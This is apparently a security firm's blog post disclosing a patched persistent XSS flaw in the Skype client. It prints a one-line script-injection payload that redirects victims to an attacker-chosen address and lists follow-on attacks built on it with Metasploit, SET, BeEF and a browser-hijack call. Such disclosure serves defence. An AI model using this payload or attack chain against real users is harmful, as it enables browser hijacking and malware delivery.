Skype has patched and released the fix for the Skype bug we found so we can discuss the details of the bug.
Several other people have reported the same bug. Basically it is a persistant XSS attack that allows an attacker to redirect a victim to any website hosting malware. It is caused by Skype failing to sanitize a message before the client renders the message. It is persistant because it is stored in the users chat history and the payload is re-executed everytime the contact is clicked. It requires no user interation and can be triggered just by sending a message. As far as we could tell there was no setting to prevent this. The following proof of concept demonstrates this:
http://www.example.com/?foo="><script>document.location='http://10.11.1.225';</script>
The success of this attack is up to the attackers imagination. Some of the examples Pure Hacking tested were:
1) Using a browser exploit to execute shellcode
2) Using metasploits browser autopwn
3) Using SET to clone the skype.com website so the victim was redirected to what looked like the Skype website and running a malicious java applet
4) Using Beef to hook in a zombie
5) Using the the javascript attack API
Several people have also asked us to test the 2.x version of skype. As far as we could tell it was not vulnerable at this stage.
The screenshot below shows the victims client being redirected to the javascript attack API. The victims browser has then been hijacked using the $A.hijackView({url:'http://www.purehacking.com/'}) function.
Links:
[1] http://www.purehacking.com/users/gordon-maddern
[2] http://www.purehacking.com/blog/tags/0day
[3] http://www.purehacking.com/blog/tags/exploit
[4] http://www.purehacking.com/blog/infastructure-protection
[5] http://www.purehacking.com/blog/tags/metasploit
[6] http://www.purehacking.com/blog/tags/skype
[7] http://www.purehacking.com/blog/tags/sploit
[8] http://www.purehacking.com/blog/tags/xss